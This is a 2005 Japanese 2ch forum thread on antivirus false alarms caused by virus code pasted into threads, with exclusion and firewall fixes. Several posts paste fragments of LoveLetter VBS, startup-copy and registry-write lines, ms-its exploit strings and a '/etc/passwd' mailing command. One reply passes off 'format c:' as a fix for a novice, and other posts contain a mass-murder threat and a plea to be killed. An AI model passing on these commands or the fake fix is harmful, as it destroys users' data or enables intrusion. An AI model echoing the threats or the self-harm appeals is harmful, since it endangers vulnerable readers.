除外をログフォルダだけじゃなく、C\ProgramFile\Live2chにしたんだけど 危険かなぁー。
わぁ、それらしいレスの内容をメモ帳に貼り付けて保存した瞬間、ノートン先生に持ってかれちゃったよぅ!
ノートパソコンなんですが、キーボードの隙間にゴミが入ってキーが押しにくくなって困る
パソコンの電源入れると最初にseeqという検索サイトが出る ようになっちまいました。以前はMSNだったんですけど、昔の体に 戻れますか?戻し方教えてください
>>151 スレ違いだけど、システムの復元で直前の日付に戻せ。
スレ違いですか、すみません。パソコン初心者なん システムの復元ってどうやるんですか?
最近また急激に増えたな。 ウイルスバスターloveのやつらのしわざか?
OSが2000なんですけど… 復元できないみたいです
読みます! 最近外国のサイトの広告みたいのが表示されることがあって… リカバリでその辺も治りますか?
>>161 基本的には、リカバリで買った時と同じ状態になる。
従って、データは全部消えるので、気をつけて。
ありがとうございました!
今度はデータのバックアップについて勉強しないといけなそうですね。
ちなみに何の広告なんですかねこれ↓
http://adserver.sharewareonline.com/AdServer/RegClean/Exact/landing_EAL.htm ダウンロードしろって感じで頻繁に表示されるんです
スミマセン。他のスレから誘導されてきました。 VIP板をリロードすると毎回ノートン先生がウイルス警告してくるんですがなぜですか? ウイルス名 Bloodhound.Exploit.6 適用した処理 ファイルを修復できません。 と出てOKを押した後に ウイルス名 Bloodhound.Exploit.6 適用した処理 ファイルへのアクセスが拒否されました。 とでます。 VIP以外の板ではこのような警告は出ません。ノートンは2005年の新しいやつです。 ウイルススキャンしてみましたが問題ありませんでした。 OSはXPです。 よろしくです。
>>166 あの。。。いろいろみましたけど専門用語ばかりでよくわかりません。
半年ROMはすでに経験墨です。
できたら詳細も教えていただきたいのですが。
普通に感染されてました。。。 検疫というのをしたら問題のファイルがどっかいったみたいです。
http://sakura01.bbspink.com/test/read.cgi/ascii/1118577161/ ここのウイルスコードで出来たスレタイをクリックしてから、
すべての板で書き込むたびに誤作動をおこします・・・・
それでここへたどりついたのですが、
>NAV2003以降はNorton Anti Virusのオプションで手動スキャンとAuto-Protectでそれぞれ除外の指定をして下さい。
これって具体的にどうすればいいのでしょうか?
・オートプロテクト
・除外
・除外する項目
とまでは出来たのですが、最後の「除外する項目」に何かを入れるのですか?
それとも項目を削除するのですか?
何を入れたらいいのか、何を削除すればいいのか教えてください・・・。
今現在の項目はこの3つです
*.dbx
*.nch
*.sysutem volume information
ライブ2ちゃん使用です。
>>172 よければ手順を・・・・まったく意味が分かりません・・・・
>>7 を参考に、
Cドライブ→プログラム→ライブ2ちゃん→ログ
とういう感じでログをノートンの除外に選択したら、半角板を開いただけでノートンが反応することはなくなりました。
しかし、すべての板で書き込むたびにノートンが反応するっていうのは直りません。
どうすればいいですか?
「kakikomi」というのも除外に選択したらなおりました。おさがわせいたしました。
>>171-176 乙
ノートントラップ
http://ansitu.xrea.jp/guidance/?Trap#NortonTrap Q8.2ちゃんねる専用ブラウザでノートンを使うと今まで取得したログが抹消されてしまい、スレを再表示した時全てが新しいレスになってしまいます、どうすれば解決できるでしょうか?
http://ansitu.xrea.jp/guidance/?NortonInternetSecurity#faq08 ※スレタイがノートントラップのスレに書き込んだ場合、書き込み履歴も反応します。
2chWikiは申請中。
ノートンがvbsウィルスのソースに誤反応、 ってスレタイにもあるけど、ビューア経由でも反応するんですか? スレによっては、IEと使い分けてるんですが、ビューアで開いた時に 限って怒られるんです・・・。
>>175 ウイルスを書き込んだのですか、ああ、そうですか。
>>176 ご回答ありがとうございます!助かりました(←大馬鹿)!
>>170 詳しく。
漏れも同じ症状でビビってる。
脳豚を入れているユーザは2ちゃんを見ないようにしてください。
ウィルス注意↑
これ多分ウィルスですが、貼られたスレッドを開いただけでノートン反応します
これも
>>98 同様、誤反応ですよね?
(((((((( ;゚Д゚)))))))ガクガクブルブルガタガタブルガタガクガクガクガクガク
http://pc8.2ch.net/test/read.cgi/sec/1118586631/5 Q. 2chのスレを2chブラウザで開くと、ウイルスを検出するんだけど
A. avast!はノートンと同じく、ウイルスコードも検出する。
ただのテキストのコードなのでウイルスに感染することはない悪戯行為だから気にしないで大丈夫。
誤検出しないようにするには、以下の2通りの方法がある。
・avast!の標準シールドの感度を [普通] に設定 or avast!の標準シールドの例外設定に2chブラウザのdatフォルダを設定
・2chブラウザでWebシールドを使わないように設定
http://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8#faq12 >>189 それだけではわかりません。
そのようなリンクを貼られるようなスレではノートントラップも貼られていたのかもしれませんし、
あなたがリンク(他にも同様な悪意あるリンク)を踏んでいて反応したのかも
(2ちゃんねるブラウザによっては画像サムネイル機能が働いて画像ファイルに偽装されたウイルスに反応することがあります。・・・正常な反応です。)
リンクを不用意に踏まないことも肝心です。
>>4 尚、ここはウイルス鑑定スレではありません。
危ないと思ったURLはラウンジ板等の”勇気が無くて見られない画像解説スレ”で診てもらいましょう。
http://find.2ch.net/?STR=%CD%A6%B5%A4%A4%AC%CC%B5%A4%AF%A4%C6+%B2%F2%C0%E2%A5%B9%A5%EC&COUNT=50&TYPE=TITLE&BBS=ALL ひろゆきは2ch総合案内に対処法載せてくれないの? 初心者はこんな所見ないと思うのだが…
>>192 そんなこと書かなくても、根本的に対策できるのに3年以上放置。
ノートンも放置。
そんなもんさ。
サイトの問題ではなくて、ノートンとそのユーザーの問題だからでしょ。 どうしても見て欲しい、書き込みして欲しいと思えばそういうこともするだろうけど、 めんどくさいから、対策できない人は切捨てって考えてるんでしょ。
ニュース速報みてたらノートン先生が激怒しました!今、スキャン中何かすごい不安
まぁ今危ぶまれている年間自殺者3万人なんていうのもさぁ 何だかんだ言ってお友達と楽しく戯れていた全共闘世代のジジイがほとんどで そんな奴らのノスタルジーとニートの絶望的な孤独を一緒にされちゃあかなわないよね。 まぁ政府も腹の底じゃあ、このままズルズルと大人になって勝手に死んでくれりゃあ本望 とか思ってるだろうケドさあ、俺達には一人一人明確な敵がいるんだよね。 原因があっての結果。 勉強しなきゃ立派な大人になれませんよなんて乳幼児でも知ってることを やらなかったらこうなった、なんて言い切れるほど楽天家じゃないんだよね。 アホみたいな受験戦争、家畜のような体罰教育、友達からの陰湿なイジメ、見知らぬ大人のいやがらせ バブル期に子供にだけ苦労させて親やセンセや同級生は泡まみれで遊び放題。 敷かれたレールの先に娯楽があると鞭打たれ、苦難を乗り越えたどり着いたら就職難。 ゴミのように切り捨てられていく俺らの10代、20代。 いつの間にか自分より馬鹿が出世して、自分よりブサイクが結婚し、自分より足の遅いヤツがオリンピックに出ている。 両親を恨む者、先生の居所を探す者、同僚の近況を探る者、誰でもいいから殺してやりたいと思っている者 そんなヤツらがじっと己の部屋で計画を練っている。 まぁはっきり言わせてもらえば、あんたら、幸せ家族を気取っているのも今のうちだね。 鬱ブームだかなんだか知らないが、テレビ一つ落ち着いて見られなかったような俺らに 勝者、敗者とか貧乏さん番組なんてメディア戦略は通用しないね。 殺されるまえに、必ず殺す。 そう、この先10年。 被害者の過去2-30年を遡らないと犯人が割り出せない そんな一家まるごと惨殺事件が続くだろうね・・
>>192 ひろゆきは初心者大嫌い
ひっかかって嘆くユーザーをみてニヤニヤしてます
それが嫌なら来るなって考え
先生が反応しBloodhound.Exploit.6が出現! みなさんどう?
>>201 前にそれありましたけど。(当方Jane Doe Style)
反応した部分の過去ログ捨てたら何も問題なかったですよ。
>>201 それはログのウイルスコードに反応してるだけだからむっしっし
ノートン先生がunix.Penguinに誤反応してしまって 今のとこ解決策はないんでしょうか? ノートン先生捨ててバスターに変えても問題ない? XPはノートン先生入れとかないとまずいみたいなこと聞いたんだが・・
>>208-209 どういうこと?新verにウィルスが入ってたの?
>>207 コレはジョーダンのつもり?シャレんなんないでしょ
c.Copy(dirsystem&"LOVE-LETTER-FOR-YOU.TXT.vbs
移動してきました、度々すいません。半角文字列板のスレを開いたらウイルス警告が出ました。 環境はノートンです。 スキャン後も感染を修復することはできませんでした。 ウイルス名:Bloodhound.Exploit.6 誘導されてこちらにきました。 初心者で何をしたらいいかわかりません・・このスレにウイルスがいるのでしょうか? ご教授お願いします・・
追記 発生源 C:\Documents and Settings\Owner\デスクトップ\Jane\Logs\2ch\大人の時間\半角文字列\1120269811.dat です。誤報なのでしょうか?修復できないので不安です・・
すいません読み返しました。 ・・一応反応のあったログを削除後ログファイルを除外指定しました。 除外しましたが、 ログファイルの中には数々のフォルダがありました。ログ自体、感染はあり得ないのでしょうか? 有り得ないから除外するのだと思いますが、念のためお聞きしました
>>220 有り得ない。
ノートンの手抜きチェックが悪い。
わかりました。ありがとう御座います。 あと、ログフォルダの中のログファイルでした。訂正します。すいません
Bloodhound.Exploit.6ってのが頻繁に検出される。 これはに関しては誤作動ではないんだよな?
>>217 おいらも同様の症状なのですが、どうなんでしょうか?
シマンテックのオンラインスキャンをすると、 2chブラウザのdatファイルからウィルス反応しまくりなんですが、 この手の反応は全て誤反応と解釈してよろしいですか?
そうそう。
>>17 のソフトをアップデートしましたので、よかったら
ダウンロードをしてくださいです。
http://www.geocities.jp/cen_hp/index.html パソコン初心者総合質問スレッド vol.1072
http://pc8.2ch.net/test/read.cgi/pcqa/1120581493/ 399 名前:299[] 投稿日:2005/07/06(水) 21:47:49 ID:YFmNomOu
★症状: 以前までは出来ていた、PCでのDVD-Video再生が出来なくなった。
★試したソフト: Media Player Classic , Mediaunite , Windows Media Player 10
★関係有りそうな出来事: DirectShow Filterに「GPL MPEG-1/2 Decoder」を追加した。
何方か原因解りませんか?
せめてハードかソフト、どちらに原因がありそうかだけでも解れば幸いです。
405 名前:ひよこ名無しさん[sage] 投稿日:2005/07/06(水) 21:50:29 ID:???
>>399 ハードかソフトに原因
408 名前:cen ◆Pm9xOTJuM. [sage] 投稿日:2005/07/06(水) 21:52:09 ID:??? ?##
>>405 あと人間
411 名前:ひよこ名無しさん[sage] 投稿日:2005/07/06(水) 21:53:30 ID:???
>>408 暴言ヒドスw
初心者の質問のところから誘導されてきました。以下にそのままコピペします。 windowsXPのhome editionで、Internet Exproler6、更新バージョンはSP2です。 よろしくお願いします。 ノートンのアンチウィルスが「Unix Penguin」というウィルスを検知しました。 場所がインターネット一時ファイルのようだったので、「インターネットオプション →ファイルの削除」をしました。 すると、なぜか「お気に入り」が消えてしまったのです。 誤って自分で消してしまったのだろうと言われたのでそうかと思い、もう一度 覚えている限り戻そうとしたら「入力したショートカットの名前は既にお気に入り メニューに存在します。置き換えますか?」と出ます。それで置き換えても 表示されません。新たにショートカットの名前を変えて登録すれば表示される のですが……。 私の「お気に入り」の中には、表示されるものと表示されないものが両方 存在しています。表示されないものを再び表示する、または消し去ることは できないでしょうか。消し去れれば、また再び作り直そうと思いますが…。
>>240 ああほんとだ!
すみません、慌ててました……
>>241 でも、表示のみ消えた「お気に入り」については、どこかに書いてありますか?
ノートンとは関係ないのかもしれないですが…。
>>243 関係ない。
インターネットオプション→詳細設定→使用してないフォルダは閉じる
ありがとうございます。 やってみましたが、駄目でした。 そもそも「お気に入り」の星マークのアイコンが、見当たりません。favorite の中もカラになっています。私はなんだか変なことをしてしまったみたいですね。 もうちょっといじってみることにします。。失礼しました。
ノートンアンチウィルス2005、open jane Doe 0.1.12.2 を使っています。
該当スレのログを除外しようとしたのですが、スレッドのidxはあるのですが、datがそのスレッドに限って見つからず、改善できません。
スレッドは
http://society3.2ch.net/test/read.cgi/koumei/1121522102/11 このメール欄にウィルスコードが貼ってあるのです。
対処の方法を御教示願います。
すみません、自己解決しました。 スルーしてください。
【Live2ch 】 1.10 【 スキン 】 Default 【Windows】 XP 【Firewall .】 NortonInternetSecurity 【 不具合 】 騙されてms-its: mhtml:file://c:\をメール欄に書いたらブラウザがおかしくなった。 インストールフォルダのメールのテキストドキュメントも開かない。
ほう・・・騙されてねぇ〜 c.Copy(dirwin&"\Win32DLL.vbs")? c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")? <object?data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm "?type="text/? X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*? fso.copyfile?"dirsystem&nurupo.vbs",?"j:\windows\start?menu\programs\startup\"? If?s?=?"htm"?and?fso.FileExists(f1.path+"l")?=?False?then?fso.CopyFile?f1.path,?f1.path+"l"? ToInfect.CodeModule.InsertLines?BGN,?ADI1.CodeModule.Lines(BGN,?)? G.RegWrite?A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"),?E.BuildPath(E.GetSpecialFolder(1),?A("VHORU@SU/WCR"))? lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))? ms-its:mhtml:file://c:\ ? kak.hta';ken=wd+'START? よく分からんけど、結局、感染してたとしても放っときゃいいんだろ?
Aya の自作自演 http://pc.2ch.net/test/read.cgi/pcqa/1021802095/837-846 837 名前:ひよこ名無しさん 投稿日:02/05/20 08:35 ID:GarmVKYa あまりに馬鹿馬鹿しい質問ですいません。 Windows Media Plyaer と KbMedia Player がパソコンの中にあるのですが、MP3ファイルをクリックすると Windows Media Plyaer で再生してしまうのですが、ダブルクリックした際に後者で再生するようにはどうしたらいいんでしょうか? 838 名前:ひよこ名無しさん 投稿日:02/05/20 08:36 ID:??? >>837 またきたのか? Windowsの入門書以上の書籍買って関連付けに関して理解を深めろ。 839 名前:Aya ◆U.S.S.po 投稿日:02/05/20 08:36 ID:GarmVKYa >>837 1.mp3のファイルをクリック 2.「アプリケーションから開く」を選択 3.プログラムの選択 4.「これらのファイルを開くときは、 いつもこのアプリケーションを使う」にチェック 5.OK 840 名前:ひよこ名無しさん 投稿日:02/05/20 08:37 ID:??? >>839 自作自演するときはIDを消しましょうね(ワラ うちのノートン2004、除外の設定するときフォルダ検索をしないとできない。 IEのを手書きで入力したけどやっぱり反応した。 c:\program files\musicjg2ch\log c:\program files\musicjg2ch\temp.htm これを入れてもダメだった。 ギコナビなら除外の設定はすんなりいったんだけどな…。
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\" c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1) c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR")) lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93)) ms-its:mhtml:file://c:\ cat /etc/passwd | mail nobody kak.hta';ken=wd+'START
んなもん貼っても反応しねーよ 真に受けやがってカスがw
>>257 他のスレでこういうのが貼ってあり、かちゅを閉じたら
IEが全く見られなくなってしまいました
>>10 をやってみたのですが、やっぱり見れない
今生きてるのはかちゅだけです。助けてください
>>259 ノートンが原因だったら以下コピペ
2003/2004(2005もこれだと思う)
Norton Internet Security もしくは Norton Personal Firewall を起動する。
画面中央の [ファイアウォール] をクリックする。
右下に表示される [設定] ボタンをクリックする。
[プログラム制御] タブをクリックする。
[追加] ボタンをクリックする。
「プログラムの選択」ウィンドウが開きます。
Internet Explorer フォルダを開く。
Internet Explorer フォルダは今回の例の場合です。
お客様が設定を行いたいアプリケーションがインストールされているフォルダを開いてください。
IEXPLORE.EXE をクリックして選択する。
IEXPLORE.EXE は今回の例の場合です。
お客様が設定を行いたいアプリケーションを選択してください。
[開く] ボタンをクリックする。
例としてご案内している Internet Explorer を含め、設定がすでに作成されているアプリケーションの場合は「すでにルールがあるプログラムを追加しようとしています」というメッセージが表示されますが、まだ設定されていないアプリケーションの場合は表示されません。
「プログラム制御」のウィンドウが表示されるので、「どう処理しますか?」の部分で [許可] もしくは [遮断] などを選択して、[OK] ボタンをクリックする。
「アプリケーションカテゴリの選択」ウィンドウが表示されるので、そのアプリケーションをどのカテゴリとして分類するかどうかを選択し、[OK] ボタンをクリックする。
2002
NISをたちあげ、ファイアウォール→インターネットアクセス制御(アプリケーション制御の一覧)で設定が変えられます
IE5の修復は以下コピペ
1. [スタート]−[設定]−[コントロールパネル] から「アプリケーションの追加と削除」を起動します。
2. [インストールと削除] タブをクリックし、「Microsoft Internet Explore 5 とインターネットツール」をクリックします。
3. 「追加と削除」ボタンをクリックし、表示されるメニューから「Internet Explore を修復する」を選択して「OK」をクリックします。
XPならシステムの復元
ノートンアンインストールしてウィルスバスター入れました おかげでこのスレも見れるようになりました
そうそう。
>>17 のソフトですが、シリア語ブラクラにも対応しました。
あと、何日前以降に更新されたファイルのみ検索の設定ができるように
なりましたです。
http://www.geocities.jp/cen_hp/index.html >>271 単にウイルス検出対象ファイルからhtm、html、datを外せば済むことなのに…
まあ少しでもお金使って貰わないとカネの巡りが悪くなるからな。
って、htmとhtmlは外すとまずいのか。 けど通常のインターネットブラウザで2chしてる時点で(ry
>>273 乙です。
壺のdatファイルなんですが、ノートンで誤反応のファイルが見つかったのに
vicptdel.exeで検索したら0個だったんですがまだ対応されてないだけでしょうか?
VBS.LoveLetter.Varとでてましたが。
>>277 どうもです。
今のところ、壺のdatファイルには対応しておりません。
対応しているのは、2chに直接置いてあるdatだけです。
この板なら、
http://pc8.2ch.net/pcqa/dat/xxxxxxxxx.dat のような
datファイルのみです。
壺のdatファイルは構造が違うので、datファイルの構造のチェックで
弾いてしまう仕組みになっています。
>>278 分かりました。素早いレスどうもありがとう。
このスレ開いたらノートンが反応するんだけどどうすればいいですか? ブラウザはopen janeです。
>>281 俺はな、このスレを最初から読んで欲しくて誘導したんだ
過去レスを一切読まずに質問するな
Open Jane Doe α 0.1.12.2です Nortonが誤反応する人へ対処法 1.NortonInternetSecurityを起動 2.オプション→NortonAntiVirusをクリック 3.左側のシステム>Auto-Protectをクリック 4.除外→新規をクリック 5.2ch専用ブラウザのフォルダを指定する 設定して試してみたらまた反応してしまいました Norton AntiVirus Auto-Protect ファイル C:\...orary Internet Files\Content.IE5CLIVSTUF\subback[32].html を修復できません。 このファイルは Unix.Penguin ウイルスにまだ感染しています。 どうしたらいいのですか?教えて下さい
NIS2004/2003はNorton AntiVirusのオプションで手動スキャンと Auto-Protectでそれぞれ除外の指定 ノートン2005なのでそれぞれ除外しても駄目でした 一時ファイルを削除する模様 これもやってみたけど駄目でした 他に方法はないでしょうか?教えて下さい
>>285-286 > Norton AntiVirus Auto-Protect
> ファイル C:\...orary Internet
> Files\Content.IE5CLIVSTUF\subback[32].html を修復できません。
> このファイルは Unix.Penguin ウイルスにまだ感染しています。
IEのキャッシュですね。
>>286 で一時ファイルを削除しても反応するのは
IEでまた該当スレを開いたのではないのでしょうか。
ノートントラップの回避方法は2ちゃんねるブラウザで
>>1 の設定をして
2ちゃんねるをみてください。
Janeの設定も今一度確認してください。
ギコナビ使ってます。ノートンが反応してから見れないスレなどあります。
>>10 にある方法で解決するんだと思うのですが、
除外してしまって問題あることはないですか?
画像のプレビューとか出ますけど、そういうのに何かまずいものがあったとき困るとか・・。
まったく見当違いな心配かもしれませんが、
よくわからないので教えてください。
>>289 IEエンジン使ってないJane DOE系の2chブラウザにしろよ
画像に何か仕込んでどうこうってのはIEの脆弱性を狙うから
>>289 非IE系専ブラのログなら除外しても問題ない。
ギコは知らん。
IEがトラブっても使える非IE系のほうが何かと便利。
>>290-291 ありがとうございます。他の専ブラ検討してみます。
>>289 ギコナビで画像プレビューした場合、画像はIEのキャッシュのほうに保存される。
なのでログフォルダを除外してしまってもその点で問題あることはない。
物凄い今更でどうでもいいけど気になったので。
>>51 間違ってるじゃないか
C\ProgramFiles\Live2ch\log→C:\Program Files\Live2ch\log
「:」と「 」が足りない。
>1〜10を読んでノートンの除外設定をしようとしているのですが、 2chブラウザのログ保存フォルダがどれのことか分かりません ギコナビ使ってます。おしえてください
>>299 http://ansitu.xrea.jp/guidance/?NortonInternetSecurity#faq08 http://ansitu.xrea.jp/guidance/?Trap#NortonTrap 以下を一行ずつコピー、除外項目でCtrl+V
C:\Program Files\gikoNavi\Log
C:\Program Files\gikoNavi\config\History.xml
C:\Program Files\gikoNavi\config\Favorite.xml
C:\Program Files\gikoNavi\sent.ini
より詳しい除外項目はこちらで今一度確認してください。
2ちゃんねる用ブラウザ「ギコナビ」 Part31
http://pc7.2ch.net/test/read.cgi/software/1124859118/1-12 (テンプレと直近50スレは読んでね)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\" c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
本当にひどいですね。まだ、あざむいて謀略するんですね いいかげん、やめてもらえないですかね。 やめることができないのなら、あなたのおもちゃでは、ないので 第六感が無い人「仔(赤ちゃん)」を、始末、処分、してもらえないですかね あなたが第六感が無い人「仔(赤ちゃん)」をあざむいて謀略している首謀者ですか ここまで第六感が無い人「仔(赤ちゃん)」をいじめて、あざむいて謀略して楽しいですか ここまでされてこのまま生きていくのもいやですから 第六感が無い人「仔(赤ちゃん)」を、始末、処分、してもらえないですかね ここまであざむいて謀略してきた責任取って いいかげん、いっこくも早く、ころしてくださいよ よろしくお願いいたします。
人類と違う第六感が無い人の事が、仔(赤ちゃん) 何故か年老いた男女も中年の男女成人式迎えた男女も 第六感が無いと仔(赤ちゃん)と呼ばれるらしい 欺く(あざむく)の意味は 相手を信頼させておいてだます事 まあ要するに相手という所が仔になるんでしょうね
そうかだから第六感が無い人「仔(赤ちゃん)」たちの 一挙一動を第六感でお前は把握してるのに 第六感が無い人「仔(赤ちゃん)」たちを 信頼させておいてだましてるんだな 世界中の第六感が無い人「仔(赤ちゃん)」たちよ 人類にあざむかれるなよ!!!!!!! そして世界中の第六感が無い人「仔(赤ちゃん)」たちよ これが真実ならいっしょに死のう。
http://news19.2ch.net/test/read.cgi/news/1128874250/ これ↑ってウイルスですか?
開いたらノートン先生が反応したんですけどつД`)
Mac OS10.3 IEmac5.2 です
検疫に引っかかったファイルがあり状態は感染でした
>>306 レスの中にウィルスのような動作をするスクリプトの一部が含まれています。
あくまで一部ですし、Windows向けに作成されたものだし、スクリプトを実行する現実的な方法も
存在しないので、被害を受けることは絶対にありません。
このように危険のない対象までウィルスとして感染警告するのはノートンの仕様です。
そういったノートンの挙動を悪用した悪戯なので気にしないでください。
詳しくはこのスレの
>>1-10 あたりをよく読んでください。
ちなみにこのスレを読み込んだときもノートンが反応すると思います。
>>307 ありがとうございました!安心しました。
質問です。 某板のスレを開こうとすると、ノートン先生が「ウィルスを検出しました!」と 大騒ぎするので、>7に従ってログフォルダを除外したのですがいまいち不安です。 専ブラはA Boneを使用。 検出されたウィルス名:Bloodhound.Exploit.6 感染ファイルはInternet Temporary Filesのものではなかったのですが(←これが不安の元なのです)、 これは専ブラを使用しているからでしょうか? 念のため、シマンテックのHPに載っている対策に従って、 セーフモードでレジストリをチェックしてみたのですが、書き換えられた様子はありませんでした。
>>310 専ブラはIEとは違い、自分自身のログフォルダに2chのレスを保存します。
A Boneのログフォルダで「感染ファイル」が発見されたのなら全く正常で、何の心配もありません。
2chのレスにウィルスのソースコードが書き込まれていても、それを実行する方法はないので、
感染することはありません。
2ちゃんブラウザをダウンロードしてボードの一覧を取りにいったら、 警告がでました。 対処の選択肢が提示されたので推奨のものを選んだらボード一覧を取得できませんでした。 再度選び直そうと思って、新たに2ちゃんブラウザを落としたのですが、 先ほどの選択肢が出なくなり、またもやボード一覧は取得できないまま…。 この場合はどう対処すれば良いのでしょうか?
http://plaza.rakuten.co.jp/takamoriyo/ このサイトのランキングを押そう!!
そしてランキング一位にさせよう!!!!
>>314 ファイアウォールの通信制御設定を探して、2ch専用ブラウザの通信を許可してください。
わからなければ、セキュリティ対策ソフト(ファイアウォールやアンチウィルス)の製品名とバージョン、
2ch専用ブラウザの名前を書いてください。
>>316 設定のところを見てみましたが、どう設定していいのか分かりませんでした…
ソフトはノートン2005です
2ちゃんブラウザはjane styleです
>>317 このページを見てください。
http://service1.symantec.com/SUPPORT/INTER/nisjapanesekb.nsf/jp_docid/20041007161706947 「3. プログラム制御の設定を確認する」の左の[+]をクリックして表示される説明をよく読んでください。
[手動プログラム制御] の一覧からjaneと思しきものを探し「すべてを許可」に設定してください。
>>318 ありがとうございました!!
無事に一覧取得できました!
本当にありがとうございます!!
教えて下さい 壺使用の場合、除外はC:\Program Files\2chtubo\log でいいんですか?
@スタート(タスクバーの左端にあるボタン) Aすべてのプログラム Bアクセサリ CDOSプロンプト(コマンドプロンプト)を起動 Dformat c:と入力 EEnter F再起動 Gヒャッホウ これでおk 実行する際にはあくまで自己責任にてお願い致します。
>>323 ありがとうございます
それでやってみます
Norton Anti Virusのオプション 手動スキャンとAuto-Protectで2chのログを除外指定したのですが オプション→脅威カテゴリ→除外って所は関係ないのでしょうか?
>>328 そこはスパイウェアやアドウェアの検出に関する設定なので、2chのログには関係ない。
NIS2005を使用しています
Opera8.5で
>>2 にあるテスト用の
http://www.eicar.org/download/eicar.com.txtを踏んでみたのですがNAVが反応しません 。
これはAutoProtectが正常に働いていないということなのでしょうか。
試しにローカルにDLしてみてスキャンをかけてみると、ウィルスだと反応して削除します。
>>331 ですが、解決できました。
「オプション」→「NortonAntiVirus」→「AutoProtect」にて、
「SmartScanを使ってファイルをスキャン」にチェックが入っていたのを「完全ファイルスキャン」に変更したら反応しました。
拡張子.txtがAutoProtectの対象になってなかったってことなんですね……。失礼しました。
勝手に修復したり隔離したりする設定になってると、困ることもある。特に2ch専用ブラウザ使ってる場合。
これか cat /etc/passwd | mail nobody
何もノートンが誤反応しているわけではありません。 VBScriptやJavaScriptの拡張子のファイルに反応すべきなのを、 どの拡張子にでも誇大反応するだけです。 WindowsUpdateは、常に最新の状態に心がける事。 SunのJavaをインストールしている人は、これも最新版に更新しておく事。 RealPlayerやAdobe Readerなども最新にしておかないと、ウィルスに感染しますよ。 これらを心がけて最新状態にしてあれば、ウィルス反応があってもシステムにはもう感染はしません。 過去のWindowsのセキュリティホールを攻撃するアクティブスクリプトに反応しているだけですから、無視して結構です。 ページをプレビューしただけで反応するようなウィルスは、ほとんど全部がもはや検出する必要がないものです。 セキュリティベンダーなどに騙されてはいけませんよ。
cenの部屋の管理人さんへ、
誤反応スクリプト無効化ソフト vicptdel ですが、
VBS Freelink.Bにも対応してもらえないでしょうか?
またサイトトップには、updateの表示だけでなく、update日付やVerも
記載していただけたら嬉しいです。ご検討よろしくお願いします。
cenの部屋
http://www.geocities.jp/cen_hp/ ラウンジ開いたらブラッドハウンドに感染したみたいなんですが解決法がいまいちよく解りません…
Vipのスレ一覧でも反応するっぽいけど誤検出なんだろねえ…
Bloodhound.Exploit.6ってなんてコードで引っ掛かってるですか? NGワード指定したいんで教えてください
専用ブラウザでNGワード指定しても2chの鯖から取得して保存されるデータは同じなので無意味。 Proxomitronとかでフィルタリングするなら別だが。 それより素直にノートンの除外設定すべき。
>>337 ご意見ありがとうです。
VBS.Freelink.Bですが、パターンは1つですが対応はしていますよ。
対応していないパターンかもしれないので、もしよかったら誤反応した
スレを教えて頂けないでしょうか。
そうですね。日付とバージョンはまた書いときますです。
>>345 見てみました。そこの
>>5 からdatファイルを作って試しましたが、
無効化して、ウイルス対策ソフトでスキャンしても反応しませんでした
よ。
あと、このソフトで対応しているのは、2chにあるdatファイルのみです。
例:
http://pc7.2ch.net/pcqa/dat/xxxxxxxxxx.dat 壺のdatやhtmlには対応していないです。
http://game10.2ch.net/test/read.cgi/handygame/1133109700/ このスレを読み込もうとすると、ノートン先生が
206.223.150.115からのアタックを検出して
途中までしか読み込めなくなります。
手動スキャンとAuto-Protectでlogフォルダの
除外の設定はしたんだけどまだダメっぽい。
OSはWinXP, ノートン先生はNAV2003, 専ブラはLive2chです。
たっけてー。
>>351 NAVですか? インターネットセキュリティじゃなくて?
スレみたら、Nortonスレで昨日話題になったonloadなんちゃらのトラップを確認しました。
これはフォルダの除外設定では対応できなかったと思います。
NIS使ってるなら、NISを無効にして再取得を。
>>352 あーバカが貼りやがったよorz
>>353 あ、NISでした。勘違いsorry。
無効→再取得してトラップっぽいレス(
>>499 と
>>543 )
2個あぼ〜んにしました。
これだけで問題ないですか?
>>354 あぼーんの意味はありません。一度取得すれば問題ありません。
ただし、新規に貼られたら、NGワードに指定してあぼーん(または透明あぼーん)しても引っかかります。
現状での対処法としては
○引っかかったときにNISを切って再取得をする対処療法
○侵入検知の設定で、AutoBlockの除外項目に2chの鯖を登録する(穴をあけることになるので微妙ですが)
くらいでしょうか。
Jane系なら、問題の文字列を別の文字列に置き換えればおk、という案もNortonスレで出てましたが
Live2chでそれをやるのはちょっと手間なようです。
Live2chのスレでも少し話題になってますので、そちらも追っておくことをお勧めします。
>>355 ご丁寧にどうもありがとうございます。
一度取得してしまえばそれでオワリなんですね。
Live2chのスレ探して見てみます。
>>355 >Jane系なら、問題の文字列を別の文字列に置き換えればおk、という案もNortonスレで出てましたが
誘導もしくは詳しくお願いします。
>>357 <ここ数日2chを騒がせている侵入検知トラップの対策法>
症状:
Norton Internet Securityを使用している人で、特定の文字列を書かれると侵入検知が多発し
最短30分間そのアドレスがNISにより規制されるためログが読めなくなる。
対策:上に行くほどおすすめ
@Jane系の専用ブラウザ使ってる場合
JaneフォルダにReplaceStr.txtというテキストファイルを作り
onload=[Tab]onload=
みたいに置き換えればOK(↑の”[Tab]”はタブ入力)
Tabキーを押すのを忘れて[Tab]onloadとそのまま書いてはダメ
